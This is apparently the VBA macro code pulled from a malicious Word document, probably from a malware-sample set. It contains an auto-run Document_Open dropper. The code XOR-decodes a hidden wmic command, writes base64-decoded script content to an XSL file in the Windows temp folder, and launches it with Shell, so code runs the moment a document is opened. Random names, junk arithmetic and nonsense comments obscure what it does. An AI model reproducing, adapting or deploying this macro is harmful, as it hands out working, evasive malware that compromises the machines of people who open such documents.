Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
main
End Sub
Attribute VB_Name = "aSbFzM"
Sub main()
Dim a7fi9 As String
Dim a6tpwc As Long
Dim a98Oa As Document
Set a98Oa = ActiveDocument
a6tpwc = a98Oa.ActiveWindow.Panes(1).Pages.Count
' Detriment areas visual
aOhHp = Array(55, 45, 41, 35, 96, 48, 50, 47, 35, 37, 51, 51, 96, 44, 41, 51, 52, 96, 111, 38, 47, 50, 45, 33, 52, 122, 98, 35, 122, 28, 55, 41, 46, 36, 47, 55, 51, 28, 52, 37, 45, 48, 28, 33, 17, 113, 50, 47, 110, 56, 51, 44, 98)
Dim acHjv As Long
acHjv = 14189 * 1
' Mistake sequence
ajuKHV = 18752 / 293
a7fi9 = aGMN5q(aOhHp, ajuKHV)

Dim ajD42e As Long
ajD42e = ActiveDocument.ActiveWindow.Panes(1).Pages.Count
' Boxer dissimulation awry meddlesome shelf describe otter
aQSD3n = Not (aQSD3n)
' Almoner swagger pacific cajole
Dim aVRHbx As Integer
Dim aQ8vSk As Long
aVRHbx = 64 + 7
aQ8vSk = 15708 / 748
at65yj = aVRHbx + aQ8vSk
' Developments pour
aK3Urm aCEGN(atyZao.a.value)
Call ax7ho(a7fi9)
If azHWh = False Then
azHWh = True
Else
azHWh = False
End If
' Suffer twins come deacon

Dim auyhP As Long
auyhP = ActiveDocument.ActiveWindow.Panes(1).Pages.Count
' Booth
Dim afu3i
afu3i = 17960 * 1
' Voluptuous shingle
Dim aJ54Mz As Long
aJ54Mz = ActiveDocument.BuiltinDocumentProperties(wdPropertyPages)
' Opprobrium compounds

End Sub
Attribute VB_Name = "abu79"
Function aCEGN(ajB29 As String)

Set alFXp = CreateObject("MSXML2.DOMDocument")

Set acXfzP = alFXp.createElement("b64")
acXfzP.DataType = "bin.base64"
acXfzP.Text = ajB29
aCEGN = StrConv(acXfzP.nodeTypedValue, vbUnicode)
Dim akg1V As Long
Dim aVYqi3 As Document
Set aVYqi3 = ActiveDocument
akg1V = aVYqi3.ActiveWindow.Panes(1).Pages.Count
End Function
Attribute VB_Name = "afyQhu"
Public Const a6OZPj As String = "c:\\win"
Function a6wNf(a1udH, ayYNf, ad5FKD)
a6wNf = a1udH Xor ayYNf
End Function
Function aGMN5q(a5G73, aRtz0)

aBmui = vbNullString
ast09 = UBound(a5G73)
For awCdXk = 0 To ast09
Dim aUR2AE
For aUR2AE = 25 To 55
Debug.Print Error(aUR2AE)
Next aUR2AE
' Basic abolitionists careers
aBmui = aBmui & Chr(a6wNf(a5G73(awCdXk), aRtz0, "apGuvZ"))
Next
aEUbge = Not (aEUbge)
' Mined
aGMN5q = aBmui
End Function
Sub ax7ho(ajsfXi)
If aMo5A = False Then
aMo5A = True
Else
aMo5A = False
End If
' Audit brew watt
Dim a7KMf As Long
a7KMf = ActiveDocument.BuiltinDocumentProperties(wdPropertyPages)
' Reasoning nvidia jewelry joseph pyre staffs distance
VBA.Interaction.Shell@ ajsfXi
Dim any76 As Long
Dim a8wUI As Document
Set a8wUI = ActiveDocument
any76 = a8wUI.ActiveWindow.Panes(1).Pages.Count
' Mastercard collectively
If aICnZ = False Then
aICnZ = True
Else
aICnZ = False
End If
End Sub
Attribute VB_Name = "atep7a"
Public Sub aK3Urm(aW47L)

Set al7zh = CreateObject("Scripting.FileSystemObject")
Dim aelS2G
For aelS2G = 7 To 42
Debug.Print Error(aelS2G)
Next aelS2G
' Muckle cubic transference gongs farmers vibration
aioZQ5 = Not (aioZQ5)
' Silk
Set a3VUf = al7zh.CreateTextFile(a6OZPj & "dows\\temp\\" & "\aQ1ro.xsl", 1)

Dim aI8KD As Long
aI8KD = ActiveDocument.ActiveWindow.Panes(1).Pages.Count
' Counterfeit vim
a3VUf.Write aW47L
a3VUf.Close
End Sub
Attribute VB_Name = "atyZao"
Attribute VB_Base = "0{BF57956D-2778-4393-8194-8EC8D272690B}{8BEC35E3-EB55-4E42-9F68-6F4A8206B294}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


INQUEST-PP=macro
